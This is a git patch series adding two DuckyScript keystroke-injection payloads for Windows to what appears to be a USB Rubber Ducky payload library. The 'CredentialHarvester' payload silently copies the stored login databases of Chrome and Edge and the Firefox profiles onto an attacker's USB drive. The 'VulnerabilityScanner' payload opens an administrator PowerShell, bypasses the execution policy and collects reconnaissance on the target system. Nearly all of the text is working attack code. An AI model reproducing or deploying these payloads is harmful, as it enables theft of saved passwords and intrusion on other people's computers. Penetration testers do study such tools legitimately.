From ddd7d2af4b0cda805b75bfc5842f98dc76bd84c8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:34:46 -0400 Subject: [PATCH 1/5] Create CredentialHarvester.txt --- .../CredentialHarvester.txt | 58 +++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt diff --git a/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt new file mode 100644 index 000000000..1c607f3ee --- /dev/null +++ b/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt @@ -0,0 +1,58 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM Open PowerShell with elevated privileges +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER +DELAY 1000 +REM Check if the USB drive exists +STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING if ($usbDrive -ne $null) { +ENTER +DELAY 500 +STRING cd $usbDrive; +ENTER +DELAY 500 +STRING mkdir BrowserData; +ENTER +DELAY 500 +STRING cd BrowserData; +ENTER +DELAY 500 +REM Copy Chrome Login Data to USB +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +ENTER +DELAY 500 +REM Copy Firefox Login Data to USB +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +ENTER +DELAY 500 +REM Copy Edge Login Data to USB +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 +REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) +STRING echo off | clip +ENTER +DELAY 500 +REM Close PowerShell +STRING exit +ENTER +DELAY 500 From 5b5c57f16b83c928ebd54347376262b63b9dc89b Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:38:24 -0400 Subject: [PATCH 2/5] Create VulnerabilityScanner.txt --- .../VulnerabilityScanner.txt | 629 ++++++++++++++++++ 1 file changed, 629 insertions(+) create mode 100644 payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt diff --git a/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt b/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt new file mode 100644 index 000000000..f7893f664 --- /dev/null +++ b/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt @@ -0,0 +1,629 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +REM Open Start Menu +CONTROL ESCAPE +DELAY 2000 +STRING powershell +REM Navigate to the context menu to run PowerShell as an administrator +DELAY 500 +RIGHTARROW +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 3000 +ALT Y +DELAY 5000 +REM Set PowerShell Execution Policy to Bypass +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 200 +ENTER +DELAY 200 +REM Create the PowerShell script in memory and execute it +DELAY 200 +STRING $usbName = "MYUSB" +DELAY 200 +ENTER +DELAY 200 +STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter +DELAY 200 +ENTER +DELAY 200 +STRING if ($usbDrive) { +DELAY 200 +ENTER +DELAY 200 +STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName +DELAY 200 +ENTER +DELAY 200 +STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner +DELAY 200 +ENTER +DELAY 200 +STRING New-Item -ItemType Directory -Path $directoryPath +DELAY 200 +ENTER +DELAY 200 +STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" +DELAY 200 +ENTER +DELAY 200 +STRING "" > $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING function check-passwordpolicy { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING net accounts +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking password policy: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function audit-services { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-service | select-object name, displayname, status, starttype +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error auditing services: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-networksettings { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-netipconfiguration +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking network settings: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-softwarevulnerabilities { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking software vulnerabilities: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-cve { +DELAY 200 +ENTER +DELAY 200 +STRING param ( +DELAY 200 +ENTER +DELAY 200 +STRING [string]$productname, +DELAY 200 +ENTER +DELAY 200 +STRING [string]$version +DELAY 200 +ENTER +DELAY 200 +STRING ) +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay = 2 +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($response.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking CVEs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING if ($_.Exception -match '403') { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds 60 +DELAY 200 +ENTER +DELAY 200 +STRING $retryResponse = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($retryResponse.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $retryResponse.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function analyze-logs { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-eventlog -logname system -newest 100 +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error analyzing logs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-openports { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netstat -an +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking open ports: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-missingupdates { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Checking Windows Update logs..." +DELAY 200 +ENTER +DELAY 200 +STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" +DELAY 200 +ENTER +DELAY 200 +STRING Get-WindowsUpdateLog -LogPath $updateLogPath +DELAY 200 +ENTER +DELAY 200 +STRING write-output "WindowsUpdate.log written to $updateLogPath" +DELAY 200 +ENTER +DELAY 200 +STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error getting Windows Update log: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-firewallstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netsh advfirewall show allprofiles +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking firewall status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-smbv1status { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking SMBv1 status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-antivirusstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-mpcomputerstatus +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking antivirus status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING check-passwordpolicy >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING audit-services >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-networksettings >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-softwarevulnerabilities >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING analyze-logs >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-openports >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-missingupdates >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-firewallstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-smbv1status >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-antivirusstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +REM Dynamically identify critical software from running processes and scheduled tasks +STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique +DELAY 200 +ENTER +DELAY 200 +STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique +DELAY 200 +ENTER +DELAY 200 +REM Combine running software and scheduled tasks +STRING $softwareList = @() +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($process in $runningSoftware) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += $process.Name +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($task in $scheduledTasks) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +REM Remove duplicates and empty entries +STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } +DELAY 200 +ENTER +DELAY 200 +REM Check CVEs for identified software +STRING foreach ($software in $softwareList) { +DELAY 200 +ENTER +DELAY 200 +STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion +DELAY 200 +ENTER +DELAY 200 +STRING if ($version) { +DELAY 200 +ENTER +DELAY 200 +STRING check-cve -productname $software -version $version >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Results saved to USB drive." +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error: USB drive MYUSB not found." +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING invoke-command -scriptblock $script +DELAY 200 +ENTER +DELAY 20000 From 582bb6138a9f8f230d9fbffc41e95333edd30f65 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:38:47 -0400 Subject: [PATCH 3/5] Rename VulnerabilityScanner.txt to Payload.txt --- .../{VulnerabilityScanner.txt => Payload.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/recon/VulnerabilityScanner/{VulnerabilityScanner.txt => Payload.txt} (100%) diff --git a/payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt b/payloads/library/recon/VulnerabilityScanner/Payload.txt similarity index 100% rename from payloads/library/recon/VulnerabilityScanner/VulnerabilityScanner.txt rename to payloads/library/recon/VulnerabilityScanner/Payload.txt From 81260982f1c44c7446de9b9b49e3cd2948b63685 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 28 May 2024 23:39:23 -0400 Subject: [PATCH 4/5] Rename CredentialHarvester.txt to Payload.txt --- .../CredentialHarvester/{CredentialHarvester.txt => Payload.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/exfiltration/CredentialHarvester/{CredentialHarvester.txt => Payload.txt} (100%) diff --git a/payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt b/payloads/library/exfiltration/CredentialHarvester/Payload.txt similarity index 100% rename from payloads/library/exfiltration/CredentialHarvester/CredentialHarvester.txt rename to payloads/library/exfiltration/CredentialHarvester/Payload.txt From f843113663277cfa6fcd7fdda7fce145835c8675 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Fri, 31 May 2024 09:31:35 -0400 Subject: [PATCH 5/5] Update Payload.txt --- .../CredentialHarvester/Payload.txt | 29 +++++++++++-------- 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/payloads/library/exfiltration/CredentialHarvester/Payload.txt b/payloads/library/exfiltration/CredentialHarvester/Payload.txt index 1c607f3ee..2e2e3f031 100644 --- a/payloads/library/exfiltration/CredentialHarvester/Payload.txt +++ b/payloads/library/exfiltration/CredentialHarvester/Payload.txt @@ -15,41 +15,46 @@ DELAY 500 STRING powershell DELAY 500 ENTER -DELAY 1000 +DELAY 1500 REM Check if the USB drive exists -STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter; +ENTER +DELAY 500 STRING if ($usbDrive -ne $null) { ENTER DELAY 500 -STRING cd $usbDrive; +STRING cd $usbDrive ENTER DELAY 500 -STRING mkdir BrowserData; +STRING mkdir BrowserData ENTER DELAY 500 -STRING cd BrowserData; +STRING cd BrowserData ENTER DELAY 500 REM Copy Chrome Login Data to USB -STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; -STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" +ENTER +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" } ENTER DELAY 500 REM Copy Firefox Login Data to USB -STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; -STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\" +ENTER +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" } ENTER DELAY 500 REM Copy Edge Login Data to USB -STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; -STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data" +ENTER +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" } ENTER DELAY 500 STRING } ENTER DELAY 500 REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) -STRING echo off | clip +STRING echo off ^| clip ENTER DELAY 500 REM Close PowerShell